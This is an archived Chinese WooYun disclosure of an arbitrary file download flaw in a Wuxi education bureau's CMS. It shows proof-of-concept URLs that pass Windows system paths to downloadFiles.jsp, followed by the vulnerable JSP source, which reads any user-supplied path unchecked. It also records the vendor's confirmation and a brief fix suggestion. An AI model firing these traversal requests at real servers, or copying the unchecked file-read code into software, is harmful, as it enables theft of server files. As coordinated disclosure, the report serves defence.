当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065945

漏洞标题:无锡市某教育系统任意文件下载漏洞

相关厂商:无锡市南长区教育局

漏洞作者: 冰火九天

提交时间:2014-06-23 18:50

修复时间:2014-08-07 18:52

公开时间:2014-08-07 18:52

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-23: 细节已通知厂商并且等待厂商处理中
2014-06-27: 厂商已经确认,细节仅向厂商公开
2014-07-07: 细节向核心白帽子及相关领域专家公开
2014-07-17: 细节向普通白帽子公开
2014-07-27: 细节向实习白帽子公开
2014-08-07: 细节向公众公开

简要描述:

无锡市某教育系统任意文件下载漏洞

详细说明:

http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\WINDOWS\system32\cmd.exe

.JPG


http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\Program Files\gpowersoft\webapps\cms\web\downloadFiles.jsp

<%@ page import="java.util.HashMap" %>
<%@ page import="java.util.Map"%>
<%@ page import="java.io.*"%>
<%
Map typeMap = new HashMap();
//以后有扩展,可以在fileExt和mimeType里,对应的加上扩展名和mimetype
String fileExt = "abs,ai,aif,aifc,aiff,aim,art,asf,asx,au,avi,avx,bcpio,bin,bmp,body,cdf,cer,class,cpio,csh,css,dib,doc,dtd,dv,dvi,eps,etx,exe,"+
"gif,gtar,gz,hdf,htc,htm,html,hqx,ico,ief,jad,jar,java,jnlp,jpe,jpeg,jpg,js,jsf,jspf,kar,latex,m3u,mac,man,mathml,me,mid,midi,mif,mov,"+
"movie,mp1,mp2,mp3,mpa,mpe,mpeg,mpega,mpg,mpv2,ms,nc,oda,odb,odc,odf,odg,odi,odm,odp,ods,odt,ogg,otg,oth,otp,ots,ott,pbm,pct,pdf,pgm,pic,"+
"pict,pls,png,pnm,pnt,ppm,pps,ppt,ps,psd,qt,qti,qtif,ras,rdf,rgb,rm,roff,rtf,rtx,sh,shar,smf,sit,snd,src,sv4cpio,sv4crc,svg,svgz,swf,t,"+
"tar,tcl,tex,texi,texinfo,tif,tiff,tr,tsv,txt,ulw,ustar,vrml,vsd,vxml,wav,wbmp,wml,wmlc,wmls,wmlscriptc,wrl,xbm,xht,xhtml,xls,xml,xpm,"+
"xsl,xslt,xul,xwd,z,zip,rar,mht";
String mimeType = "audio/x-mpeg,application/postscript,audio/x-aiff,audio/x-aiff,audio/x-aiff,application/x-aim,image/x-jg,video/x-ms-asf,video/x-ms-asf,"+
"audio/basic,video/x-msvideo,video/x-rad-screenplay,application/x-bcpio,application/octet-stream,image/bmp,text/html,application/x-netcdf,application/x-x509-ca-cert,"+
"application/java,application/x-cpio,application/x-csh,text/css,image/bmp,application/msword,application/xml-dtd,video/x-dv,application/x-dvi,"+
"application/postscript,text/x-setext,application/octet-stream,image/gif,application/x-gtar,application/x-gzip,application/x-hdf,text/x-component,"+
"text/html,text/html,application/mac-binhex40,image/x-icon,image/ief,text/vnd.sun.j2me.app-descriptor,application/java-archive,text/plain,"+
"application/x-java-jnlp-file,image/jpeg,image/jpeg,image/jpeg,text/javascript,text/plain,text/plain,audio/midi,application/x-latex,audio/x-mpegurl,"+
"image/x-macpaint,application/x-troff-man,application/mathml+xml,application/x-troff-me,audio/midi,audio/midi,application/vnd.mif,video/quicktime,"+
"video/x-sgi-movie,audio/x-mpeg,audio/mpeg,audio/mpeg,audio/x-mpeg,video/mpeg,video/mpeg,audio/x-mpeg,video/mpeg,video/mpeg2,application/x-troff-ms,"+
"application/x-netcdf,application/oda,application/vnd.oasis.opendocument.database,application/vnd.oasis.opendocument.chart,application/vnd.oasis.opendocument.formula,"+
"application/vnd.oasis.opendocument.graphics,application/vnd.oasis.opendocument.image,application/vnd.oasis.opendocument.text-master,application/vnd.oasis.opendocument.presentation,"+
"application/vnd.oasis.opendocument.spreadsheet,application/vnd.oasis.opendocument.text,application/ogg,application/vnd.oasis.opendocument.graphics-template,"+
"application/vnd.oasis.opendocument.text-web,application/vnd.oasis.opendocument.presentation-template,application/vnd.oasis.opendocument.spreadsheet-template,"+
"application/vnd.oasis.opendocument.text-template,image/x-portable-bitmap,image/pict,application/pdf,image/x-portable-graymap,image/pict,"+
"image/pict,audio/x-scpls,image/png,image/x-portable-anymap,image/x-macpaint,image/x-portable-pixmap,application/vnd.ms-powerpoint,application/vnd.ms-powerpoint,"+
"application/postscript,image/x-photoshop,video/quicktime,image/x-quicktime,image/x-quicktime,image/x-cmu-raster,application/rdf+xml,image/x-rgb,"+
"application/vnd.rn-realmedia,application/x-troff,text/rtf,text/richtext,application/x-sh,application/x-shar,audio/x-midi,application/x-stuffit,"+
"audio/basic,application/x-wais-source,application/x-sv4cpio,application/x-sv4crc,image/svg+xml,image/svg+xml,application/x-shockwave-flash,"+
"application/x-troff,application/x-tar,application/x-tcl,application/x-tex,application/x-texinfo,application/x-texinfo,image/tiff,image/tiff,"+
"application/x-troff,text/tab-separated-values,text/plain,audio/basic,application/x-ustar,model/vrml,application/x-visio,application/voicexml+xml,"+
"audio/x-wav,image/vnd.wap.wbmp,text/vnd.wap.wml,application/vnd.wap.wmlc,text/vnd.wap.wmlscript,application/vnd.wap.wmlscriptc,model/vrml,"+
"image/x-xbitmap,application/xhtml+xml,application/xhtml+xml,application/vnd.ms-excel,application/xml,image/x-xpixmap,application/xml,"+
"application/xslt+xml,application/vnd.mozilla.xul+xml,image/x-xwindowdump,application/x-compress,application/zip,application/rar,text/x-mht";
String []fileExts = fileExt.split(",");
String []mimeTypes = mimeType.split(",");
int len = fileExts.length;
for(int i=0;i<len;i++){
typeMap.put(fileExts[i],mimeTypes[i]);
}
//取得文件名和扩展名
String file = request.getParameter("file");
//file = file.replace("/","\\");
String filename = file.substring(file.lastIndexOf("/")+1);
String extname = filename.substring(filename.lastIndexOf(".")+1).trim().toLowerCase();
//获得文件的扩展名
response.setContentType((String)typeMap.get(extname));
response.setHeader("Content-Disposition","attachment;filename="+filename);
//读入文件内容,生成新的文件
FileInputStream in = new FileInputStream(file);
byte[] buf = new byte[4096];
ServletOutputStream output = response.getOutputStream();
int length;
while ( (in != null) && ( (length = in.read(buf)) != -1)) {
output.write(buf, 0, buf.length);
}
in.close();
output.flush();
output.close();
%>

漏洞证明:

如上

修复方案:

目录限制

版权声明:转载请注明来源 冰火九天@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-27 22:55

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心处置。

最新状态:

暂无